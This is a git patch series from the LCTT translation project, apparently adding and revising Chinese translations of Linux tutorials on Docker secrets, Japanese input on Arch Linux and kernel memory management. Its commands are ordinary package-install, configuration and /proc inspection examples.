diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
index 183e2ef7e3..418a43bd00 100644
--- a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
+++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
@@ -8,7 +8,7 @@ Dockers 涉密信息(Secrets)管理介绍
构建更安全的应用程序的一个关键因素是与系统和其他应用程序进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密信息。我们很高兴可以推出 Docker 涉密信息,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密信息分发功能。
-有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密信息到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
+有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 将嵌入涉密信息到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
### Docker 涉密信息(Secrets)管理介绍
@@ -26,11 +26,11 @@ Dockers 涉密信息(Secrets)管理介绍
$ echo "This is a secret" | docker secret create my_secret_data -
```
-一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密。以确保没有把任何涉密信息数据永久写入未加密的磁盘。向内部存储写入涉密信息,赋予了涉密信息跟其他集群数据一样的高可用性。
+一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中。该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密,以确保没有把任何涉密信息数据永久写入未加密的磁盘。向内部存储写入涉密信息,赋予了涉密信息跟其他集群数据一样的高可用性。
当集群管理器启动的时,包含涉密信息的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传递,将且会在管理器启动的时候使用。
-当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。
+当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理员可以访问被存储的所有涉密信息)会通过已经建立的TLS连接将其分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密信息,并且只有在管理员提供给他们的时候才能访问这些涉密信息 —— 严格地控制请求涉密信息的服务。
```
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
@@ -54,7 +54,7 @@ $ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret
cat: can't open '/run/secrets/my_secret_data': No such file or directory
```
-查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
+查看 Docker Secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
[Get safer apps for dev and ops w/ new #Docker secrets management][5]
From 81f285a563f92461d62d22cd490b361d0597287b Mon Sep 17 00:00:00 2001
From: geekpi
Date: Fri, 12 Jan 2018 08:56:29 +0800
Subject: [PATCH 262/371] translated
---
...nese Language Environment In Arch Linux.md | 100 ------------------
...nese Language Environment In Arch Linux.md | 99 +++++++++++++++++
2 files changed, 99 insertions(+), 100 deletions(-)
delete mode 100644 sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
create mode 100644 translated/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
diff --git a/sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md b/sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
deleted file mode 100644
index 0ccd924700..0000000000
--- a/sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
+++ /dev/null
@@ -1,100 +0,0 @@
-translating---geekpi
-
-How To Setup Japanese Language Environment In Arch Linux
-======
-
-![](https://www.ostechnix.com/wp-content/uploads/2017/11/Setup-Japanese-Language-Environment-In-Arch-Linux-720x340.jpg)
-
-In this tutorial, we will be discussing how to setup Japanese language environment in Arch Linux. In other Unix-like operating systems, it is not a big deal to setup Japanese layout. You can easily choose the Japanese keyboard layout from Settings. However, it is bit difficult under Arch Linux and there is no proper documentation in ArchWiki. If you're using Arch Linux and/or its derivatives like Antergos, Manajaro Linux, follow this guide to use Japanese language in your Arch Linux and its derivatives systems.
-
-### Setup Japanese Language Environment In Arch Linux
-
-First, install the necessary Japanese fonts for viewing Japanese ascii arts properly:
-```
-sudo pacman -S adobe-source-han-sans-jp-fonts otf-ipafont
-```
-```
-pacaur -S ttf-monapo
-```
-
-If you don't have Pacaur installed already, refer [**this link**][1].
-
-Make sure you have commented out (add # to comment out) the following line in **/etc/locale.gen** file.
-```
-#ja_JP.UTF-8
-```
-
-Then, install **iBus** and **ibus-anthy**. For those wondering, iBus is Input method (IM) framework for Unix-like systems and ibus-anthy is the Japanese input method for iBus.
-```
-sudo pacman -S ibus ibus-anthy
-```
-
-Add the following lines in **~/.xprofile** (If it doesn 't exist, create one):
-```
-# Settings for Japanese input
-export GTK_IM_MODULE='ibus'
-export QT_IM_MODULE='ibus'
-export XMODIFIERS=@im='ibus'
-
-#Toolbar for anthy
-ibus-daemon -drx
-```
-
-The ~/.xprofile file allows us to execute commands at the beginning of the X user session before the window manager is started.
-
-Save and close the file. Restart your Arch Linux system to take effect the changes.
-
-After logging in to your system, right click on the iBus icon in the task bar and choose **Preferences**. If it is not there, run the following command from Terminal to start IBus and open the preferences window.
-```
-ibus-setup
-```
-
-Choose Yes to start iBus. You will see a screen something like below. Click Ok to close it.
-
-[![][2]][3]
-
-Now, you will see the iBus preferences window. Go to **Input Method** tab and click "Add" button.
-
-[![][2]][4]
-
-Choose "Japanese" from the list:
-
-[![][2]][5]
-
-And then, choose "Anthy" and click Add.
-
-[![][2]][6]
-
-That's it. You will now see "Japanese - Anthy" in your Input Method section.
-
-[![][2]][7]
-
-Then change the options for Japanese input as per your requirement in the Preferences section (Click Japanese - Anthy -> Preferences).
-
-[![][2]][8]
-
-You can also edit the default shortcuts in the key bindings section. Once you made all changes, click Apply and OK. That's it. Choose the Japanese language from iBus icon in the task bar or press **SUPER KEY+SPACE BAR** to switch between Japanese and English languages (or any other default language in your system). You can change the keyboard shortcuts from IBus Preferences window.
-
-You know now how to use Japanese language in Arch Linux and derivatives. If you find our guides useful, please share them on your social, professional networks and support OSTechNix.
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/setup-japanese-language-environment-arch-linux/
-
-作者:[][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com
-[1]:https://www.ostechnix.com/install-pacaur-arch-linux/
-[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[3]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus.png ()
-[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences.png ()
-[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/Choose-Japanese.png ()
-[6]:http://www.ostechnix.com/wp-content/uploads/2017/11/Japanese-Anthy.png ()
-[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences-1.png ()
-[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus-anthy.png ()
diff --git a/translated/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md b/translated/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
new file mode 100644
index 0000000000..e924dcbf28
--- /dev/null
+++ b/translated/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
@@ -0,0 +1,99 @@
+如何在 Arch Linux 中设置日语环境
+======
+
+![](https://www.ostechnix.com/wp-content/uploads/2017/11/Setup-Japanese-Language-Environment-In-Arch-Linux-720x340.jpg)
+
+在本教程中,我们将讨论如何在 Arch Linux 中设置日语环境。在其他类 Unix 操作系统中,设置日文布局并不是什么大不了的事情。你可以从设置中轻松选择日文键盘布局。然而,在 Arch Linux 下有点困难,ArchWiki 中没有合适的文档。如果你正在使用 Arch Linux 和/或其衍生产品如 Antergos,Manajaro Linux,请遵循本指南在 Arch Linux 及其衍生系统中使用日语。
+
+### 在Arch Linux中设置日语环境
+
+首先,安装必要的日语字体,以正确查看日语 ASCII 格式:
+```
+sudo pacman -S adobe-source-han-sans-jp-fonts otf-ipafont
+```
+```
+pacaur -S ttf-monapo
+```
+
+如果你尚未安装 pacaur,请参阅[**此链接**][1]。
+
+确保你在 **/etc/locale.gen** 中注释掉了(添加 # 注释)下面的行。
+```
+#ja_JP.UTF-8
+```
+
+然后,安装 **iBus** 和 **ibus-anthy**。对于那些想知道原因的,iBus 是类 Unix 系统的输入法(IM)框架,而 ibus-anthy 是 iBus 的日语输入法。
+```
+sudo pacman -S ibus ibus-anthy
+```
+
+在 **~/.xprofile** 中添加以下行(如果不存在,创建一个):
+```
+# Settings for Japanese input
+export GTK_IM_MODULE='ibus'
+export QT_IM_MODULE='ibus'
+export XMODIFIERS=@im='ibus'
+
+#Toolbar for anthy
+ibus-daemon -drx
+```
+
+~/.xprofile 允许我们在窗口管理器启动之前在 X 用户会话开始时执行命令。
+
+
+保存并关闭文件。重启 Arch Linux 系统以使更改生效。
+
+登录到系统后,右键单击任务栏中的 iBus 图标,然后选择 **Preferences**。如果不存在,请从终端运行以下命令来启动 iBus 并打开偏好设置窗口。
+```
+ibus-setup
+```
+
+选择 Yes 来启动 iBus。你会看到一个像下面的页面。点击 Ok 关闭它。
+
+[![][2]][3]
+
+现在,你将看到 iBus 偏好设置窗口。进入 **Input Method** 选项卡,然后单击 “Add” 按钮。
+
+[![][2]][4]
+
+在列表中选择 “Japanese”:
+
+[![][2]][5]
+
+然后,选择 “Anthy” 并点击添加。
+
+[![][2]][6]
+
+就是这样了。你现在将在输入法栏看到 “Japanese - Anthy”。
+
+[![][2]][7]
+
+根据你的需求在偏好设置中更改日语输入法的选项(点击 Japanese - Anthy -> Preferences)。
+
+[![][2]][8]
+
+你还可以在键位绑定(Key bindings)部分编辑默认的快捷键。完成所有更改后,点击 Apply 和 OK。就是这样。之后就可以从任务栏的 iBus 图标中选择日语,或者按下 **Super 键(即 Command/Windows 键)+ 空格键** 在日语和英语(或者系统中的其他默认语言)之间切换。这个快捷键也可以在 iBus 首选项窗口中修改。
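+
+如果你更喜欢命令行,也可以用 ibus 自带的命令行工具确认 Anthy 引擎是否已经注册,并直接切换引擎。下面只是一个小示例,假设 ibus 已按上面的步骤安装并且守护进程正在运行:
+```
+# List the input engines that iBus knows about; "anthy" should appear
+ibus list-engine | grep -i anthy
+
+# Switch the current engine to Anthy from the command line
+ibus engine anthy
+
+# Print the engine that is active now
+ibus engine
+```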
+
+你现在知道如何在 Arch Linux 及其衍生版中使用日语了。如果你发现我们的指南很有用,那么请您在社交、专业网络上分享,并支持 OSTechNix。
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/setup-japanese-language-environment-arch-linux/
+
+作者:[][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com
+[1]:https://www.ostechnix.com/install-pacaur-arch-linux/
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus.png ()
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences.png ()
+[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/Choose-Japanese.png ()
+[6]:http://www.ostechnix.com/wp-content/uploads/2017/11/Japanese-Anthy.png ()
+[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences-1.png ()
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus-anthy.png ()
From 7dab8791843c55e91ef4ab2cb2549aab3105b60c Mon Sep 17 00:00:00 2001
From: geekpi
Date: Fri, 12 Jan 2018 09:00:06 +0800
Subject: [PATCH 263/371] translating
---
.../20170524 Working with Vi-Vim Editor - Advanced concepts.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md b/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
index 052069d66a..45f8684b58 100644
--- a/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
+++ b/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
Working with Vi/Vim Editor : Advanced concepts
======
Earlier we have discussed some basics about VI/VIM editor but VI & VIM are both very powerful editors and there are many other functionalities that can be used with these editors. In this tutorial, we are going to learn some advanced uses of VI/VIM editor.
From 05ee53722112e2d1102643104dbcd50972be9a2d Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Fri, 12 Jan 2018 12:30:40 +0800
Subject: [PATCH 264/371] Translated by qhwdw
---
...0203 How the Kernel Manages Your Memory.md | 104 ------------------
...0203 How the Kernel Manages Your Memory.md | 103 +++++++++++++++++
2 files changed, 103 insertions(+), 104 deletions(-)
delete mode 100644 sources/tech/20090203 How the Kernel Manages Your Memory.md
create mode 100644 translated/tech/20090203 How the Kernel Manages Your Memory.md
diff --git a/sources/tech/20090203 How the Kernel Manages Your Memory.md b/sources/tech/20090203 How the Kernel Manages Your Memory.md
deleted file mode 100644
index 2a95c74ecb..0000000000
--- a/sources/tech/20090203 How the Kernel Manages Your Memory.md
+++ /dev/null
@@ -1,104 +0,0 @@
-Translating by qhwdw
-How the Kernel Manages Your Memory
-============================================================
-
-
-After examining the [virtual address layout][1] of a process, we turn to the kernel and its mechanisms for managing user memory. Here is gonzo again:
-
-![Linux kernel mm_struct](http://static.duartes.org/img/blogPosts/mm_struct.png)
-
-Linux processes are implemented in the kernel as instances of [task_struct][2], the process descriptor. The [mm][3] field in task_struct points to the memory descriptor, [mm_struct][4], which is an executive summary of a program’s memory. It stores the start and end of memory segments as shown above, the [number][5] of physical memory pages used by the process (rss stands for Resident Set Size), the [amount][6] of virtual address space used, and other tidbits. Within the memory descriptor we also find the two work horses for managing program memory: the set of virtual memory areas and the page tables. Gonzo’s memory areas are shown below:
-
-![Kernel memory descriptor and memory areas](http://static.duartes.org/img/blogPosts/memoryDescriptorAndMemoryAreas.png)
-
-Each virtual memory area (VMA) is a contiguous range of virtual addresses; these areas never overlap. An instance of [vm_area_struct][7] fully describes a memory area, including its start and end addresses, [flags][8] to determine access rights and behaviors, and the [vm_file][9] field to specify which file is being mapped by the area, if any. A VMA that does not map a file is anonymous. Each memory segment above ( _e.g._ , heap, stack) corresponds to a single VMA, with the exception of the memory mapping segment. This is not a requirement, though it is usual in x86 machines. VMAs do not care which segment they are in.
-
-A program’s VMAs are stored in its memory descriptor both as a linked list in the [mmap][10] field, ordered by starting virtual address, and as a [red-black tree][11] rooted at the [mm_rb][12] field. The red-black tree allows the kernel to search quickly for the memory area covering a given virtual address. When you read file `/proc/pid_of_process/maps`, the kernel is simply going through the linked list of VMAs for the process and [printing each one][13].
-
-In Windows, the [EPROCESS][14] block is roughly a mix of task_struct and mm_struct. The Windows analog to a VMA is the Virtual Address Descriptor, or [VAD][15]; they are stored in an [AVL tree][16]. You know what the funniest thing about Windows and Linux is? It’s the little differences.
-
-The 4GB virtual address space is divided into pages. x86 processors in 32-bit mode support page sizes of 4KB, 2MB, and 4MB. Both Linux and Windows map the user portion of the virtual address space using 4KB pages. Bytes 0-4095 fall in page 0, bytes 4096-8191 fall in page 1, and so on. The size of a VMA _must be a multiple of page size_ . Here’s 3GB of user space in 4KB pages:
-
-![4KB Pages Virtual User Space](http://static.duartes.org/img/blogPosts/pagedVirtualSpace.png)
-
-The processor consults page tables to translate a virtual address into a physical memory address. Each process has its own set of page tables; whenever a process switch occurs, page tables for user space are switched as well. Linux stores a pointer to a process’ page tables in the [pgd][17] field of the memory descriptor. To each virtual page there corresponds one page table entry (PTE) in the page tables, which in regular x86 paging is a simple 4-byte record shown below:
-
-![x86 Page Table Entry (PTE) for 4KB page](http://static.duartes.org/img/blogPosts/x86PageTableEntry4KB.png)
-
-Linux has functions to [read][18] and [set][19] each flag in a PTE. Bit P tells the processor whether the virtual page is present in physical memory. If clear (equal to 0), accessing the page triggers a page fault. Keep in mind that when this bit is zero, the kernel can do whatever it pleases with the remaining fields. The R/W flag stands for read/write; if clear, the page is read-only. Flag U/S stands for user/supervisor; if clear, then the page can only be accessed by the kernel. These flags are used to implement the read-only memory and protected kernel space we saw before.
-
-Bits D and A are for dirty and accessed. A dirty page has had a write, while an accessed page has had a write or read. Both flags are sticky: the processor only sets them, they must be cleared by the kernel. Finally, the PTE stores the starting physical address that corresponds to this page, aligned to 4KB. This naive-looking field is the source of some pain, for it limits addressable physical memory to [4 GB][20]. The other PTE fields are for another day, as is Physical Address Extension.
-
-A virtual page is the unit of memory protection because all of its bytes share the U/S and R/W flags. However, the same physical memory could be mapped by different pages, possibly with different protection flags. Notice that execute permissions are nowhere to be seen in the PTE. This is why classic x86 paging allows code on the stack to be executed, making it easier to exploit stack buffer overflows (it’s still possible to exploit non-executable stacks using [return-to-libc][21] and other techniques). This lack of a PTE no-execute flag illustrates a broader fact: permission flags in a VMA may or may not translate cleanly into hardware protection. The kernel does what it can, but ultimately the architecture limits what is possible.
-
-Virtual memory doesn’t store anything, it simply _maps_ a program’s address space onto the underlying physical memory, which is accessed by the processor as a large block called the physical address space. While memory operations on the bus are [somewhat involved][22], we can ignore that here and assume that physical addresses range from zero to the top of available memory in one-byte increments. This physical address space is broken down by the kernel into page frames. The processor doesn’t know or care about frames, yet they are crucial to the kernel because the page frame is the unit of physical memory management. Both Linux and Windows use 4KB page frames in 32-bit mode; here is an example of a machine with 2GB of RAM:
-
-![Physical Address Space](http://static.duartes.org/img/blogPosts/physicalAddressSpace.png)
-
-In Linux each page frame is tracked by a [descriptor][23] and [several flags][24]. Together these descriptors track the entire physical memory in the computer; the precise state of each page frame is always known. Physical memory is managed with the [buddy memory allocation][25]technique, hence a page frame is free if it’s available for allocation via the buddy system. An allocated page frame might be anonymous, holding program data, or it might be in the page cache, holding data stored in a file or block device. There are other exotic page frame uses, but leave them alone for now. Windows has an analogous Page Frame Number (PFN) database to track physical memory.
-
-Let’s put together virtual memory areas, page table entries and page frames to understand how this all works. Below is an example of a user heap:
-
-![Physical Address Space](http://static.duartes.org/img/blogPosts/heapMapped.png)
-
-Blue rectangles represent pages in the VMA range, while arrows represent page table entries mapping pages onto page frames. Some virtual pages lack arrows; this means their corresponding PTEs have the Present flag clear. This could be because the pages have never been touched or because their contents have been swapped out. In either case access to these pages will lead to page faults, even though they are within the VMA. It may seem strange for the VMA and the page tables to disagree, yet this often happens.
-
-A VMA is like a contract between your program and the kernel. You ask for something to be done (memory allocated, a file mapped, etc.), the kernel says “sure”, and it creates or updates the appropriate VMA. But _it does not_ actually honor the request right away, it waits until a page fault happens to do real work. The kernel is a lazy, deceitful sack of scum; this is the fundamental principle of virtual memory. It applies in most situations, some familiar and some surprising, but the rule is that VMAs record what has been _agreed upon_ , while PTEs reflect what has _actually been done_ by the lazy kernel. These two data structures together manage a program’s memory; both play a role in resolving page faults, freeing memory, swapping memory out, and so on. Let’s take the simple case of memory allocation:
-
-![Example of demand paging and memory allocation](http://static.duartes.org/img/blogPosts/heapAllocation.png)
-
-When the program asks for more memory via the [brk()][26] system call, the kernel simply [updates][27]the heap VMA and calls it good. No page frames are actually allocated at this point and the new pages are not present in physical memory. Once the program tries to access the pages, the processor page faults and [do_page_fault()][28] is called. It [searches][29] for the VMA covering the faulted virtual address using [find_vma()][30]. If found, the permissions on the VMA are also checked against the attempted access (read or write). If there’s no suitable VMA, no contract covers the attempted memory access and the process is punished by Segmentation Fault.
-
-When a VMA is [found][31] the kernel must [handle][32] the fault by looking at the PTE contents and the type of VMA. In our case, the PTE shows the page is [not present][33]. In fact, our PTE is completely blank (all zeros), which in Linux means the virtual page has never been mapped. Since this is an anonymous VMA, we have a purely RAM affair that must be handled by [do_anonymous_page()][34], which allocates a page frame and makes a PTE to map the faulted virtual page onto the freshly allocated frame.
-
-Things could have been different. The PTE for a swapped out page, for example, has 0 in the Present flag but is not blank. Instead, it stores the swap location holding the page contents, which must be read from disk and loaded into a page frame by [do_swap_page()][35] in what is called a [major fault][36].
-
-This concludes the first half of our tour through the kernel’s user memory management. In the next post, we’ll throw files into the mix to build a complete picture of memory fundamentals, including consequences for performance.
-
---------------------------------------------------------------------------------
-
-via: http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory/
-
-作者:[Gustavo Duarte][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://duartes.org/gustavo/blog/about/
-[1]:http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory
-[2]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1075
-[3]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1129
-[4]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L173
-[5]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L197
-[6]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L206
-[7]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L99
-[8]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm.h#L76
-[9]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L150
-[10]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L174
-[11]:http://en.wikipedia.org/wiki/Red_black_tree
-[12]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L175
-[13]:http://lxr.linux.no/linux+v2.6.28.1/fs/proc/task_mmu.c#L201
-[14]:http://www.nirsoft.net/kernel_struct/vista/EPROCESS.html
-[15]:http://www.nirsoft.net/kernel_struct/vista/MMVAD.html
-[16]:http://en.wikipedia.org/wiki/AVL_tree
-[17]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L185
-[18]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L173
-[19]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L230
-[20]:http://www.google.com/search?hl=en&q=2^20+*+2^12+bytes+in+GB
-[21]:http://en.wikipedia.org/wiki/Return-to-libc_attack
-[22]:http://duartes.org/gustavo/blog/post/getting-physical-with-memory
-[23]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm_types.h#L32
-[24]:http://lxr.linux.no/linux+v2.6.28/include/linux/page-flags.h#L14
-[25]:http://en.wikipedia.org/wiki/Buddy_memory_allocation
-[26]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
-[27]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L2050
-[28]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L583
-[29]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L692
-[30]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1466
-[31]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L711
-[32]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2653
-[33]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2674
-[34]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2681
-[35]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2280
-[36]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2316
diff --git a/translated/tech/20090203 How the Kernel Manages Your Memory.md b/translated/tech/20090203 How the Kernel Manages Your Memory.md
new file mode 100644
index 0000000000..ca66bfdf3e
--- /dev/null
+++ b/translated/tech/20090203 How the Kernel Manages Your Memory.md
@@ -0,0 +1,103 @@
+内核如何管理内存
+============================================================
+
+
+在学习了进程的 [虚拟地址布局][1] 之后,我们回到内核,来学习它管理用户内存的机制。这里再次使用 Gonzo:
+
+![Linux kernel mm_struct](http://static.duartes.org/img/blogPosts/mm_struct.png)
+
+Linux 进程在内核中是以进程描述符 [task_struct][2](译者注:它是在 Linux 中描述进程完整信息的一种数据结构)实例的形式实现的。task_struct 中的 [mm][3] 域指向内存描述符 [mm_struct][4],它相当于一个程序内存使用情况的“摘要”。它保存了上图所示的各内存段的起始和结束地址、进程使用的物理内存页面 [数量][5](RSS,译者注:Resident Set Size,常驻内存大小)、虚拟地址空间的使用 [总量][6],以及其它一些零碎信息。在内存描述符中,我们还能找到管理程序内存的两个“主力”:虚拟内存区域(VMA)集合和页面表。Gonzo 的内存区域如下所示:
+
+![Kernel memory descriptor and memory areas](http://static.duartes.org/img/blogPosts/memoryDescriptorAndMemoryAreas.png)
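+
+这些信息在用户态也能大致观察到。下面是一个简单的示例(假设在 Linux 上,`$$` 是当前 shell 的进程号),通过 /proc 查看当前 shell 的 VmSize 和 VmRSS,它们大体对应内存描述符里记录的虚拟地址空间用量和常驻内存(RSS)大小:
+```
+# VmSize: virtual address space in use; VmRSS: resident set size (physical pages)
+grep -E 'VmSize|VmRSS' /proc/$$/status
+```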
+
+每个虚拟内存区域(VMA)是一段连续的虚拟地址范围;这些区域之间绝不会重叠。一个 [vm_area_struct][7] 实例完整地描述了一个内存区域,包括它的起始和结束地址、决定访问权限和行为的 [flags][8] 标志,以及指明该区域所映射文件(如果有的话)的 [vm_file][9] 域。不映射文件的 VMA 是匿名的。除内存映射段之外,上面的每个内存段(比如堆、栈)都对应一个单独的 VMA。这并不是强制要求,不过在 x86 机器上通常如此。VMA 并不关心自己位于哪个段中。
+
+一个程序的 VMA 同时以两种形式保存在它的内存描述符中:一种是按起始虚拟地址排序的链表,存放在 [mmap][10] 域中;另一种是以 [mm_rb][12] 域为根的 [红黑树][11]。红黑树让内核可以根据给定的虚拟地址快速找到覆盖它的内存区域。当你读取 `/proc/pid_of_process/maps` 文件时,内核只是遍历该进程的 VMA 链表,并把每一个 VMA [打印出来][13]。
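+
+你可以自己试一下。下面这个小示例(假设在 Linux 上)打印当前 shell 的前几个 VMA,每一行就是一个虚拟内存区域,包含地址范围、权限标志,以及映射的文件(匿名区域则为空):
+```
+# Each line of /proc/<pid>/maps is one VMA: address range, permissions,
+# offset, device, inode and the mapped file (blank for anonymous areas)
+head -n 10 /proc/$$/maps
+```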
+
+在 Windows 中,[EPROCESS][14] 块大致类似于一个 task_struct 和 mm_struct 的结合。在 Windows 中模拟一个 VMA 的是虚拟地址描述符,或称为 [VAD][15];它保存在一个 [AVL 树][16] 中。你知道关于 Windows 和 Linux 之间最有趣的事情是什么吗?其实它们只有一点小差别。
+
+4GB 的虚拟地址空间被划分为许多页面。32 位模式下的 x86 处理器支持 4KB、2MB 和 4MB 的页面大小。Linux 和 Windows 都使用 4KB 的页面来映射虚拟地址空间中的用户部分。字节 0-4095 落在第 0 页,字节 4096-8191 落在第 1 页,依次类推。VMA 的大小 _必须是页面大小的整数倍_ 。下图是以 4KB 页面划分的 3GB 用户空间:
+
+![4KB Pages Virtual User Space](http://static.duartes.org/img/blogPosts/pagedVirtualSpace.png)
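+
+页面大小以及“某个字节落在第几页”的换算,可以用下面这个小示例验证(假设在 Linux 上,页面大小通常为 4096 字节):
+```
+# Query the page size and work out which page a given byte offset falls in
+page_size=$(getconf PAGESIZE)   # typically 4096
+offset=5000
+echo "page size : $page_size bytes"
+echo "byte $offset falls in page $(( offset / page_size ))"   # -> page 1
+```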
+
+处理器查询页面表,把虚拟地址转换为物理内存地址。每个进程都有自己的一组页面表;每当发生进程切换时,用户空间的页面表也随之切换。Linux 在内存描述符的 [pgd][17] 域中保存了一个指向进程页面表的指针。每个虚拟页面在页面表中都有一个对应的页面表条目(PTE);在常规的 x86 分页机制下,它是一条简单的 4 字节记录,如下所示:
+
+![x86 Page Table Entry (PTE) for 4KB page](http://static.duartes.org/img/blogPosts/x86PageTableEntry4KB.png)
+
+Linux 通过函数去 [读取][18] 和 [设置][19] PTE 条目中的每个标志位。标志位 P 告诉处理器这个虚拟页面是否在物理内存中。如果被清除(设置为 0),访问这个页面将触发一个页面故障。请记住,当这个标志位为 0 时,内核可以在剩余的域上做任何想做的事。R/W 标志位是读/写标志;如果被清除,这个页面将变成只读的。U/S 标志位表示用户/超级用户;如果被清除,这个页面将仅被内核访问。这些标志都是用于实现我们在前面看到的只读内存和内核空间保护。
+
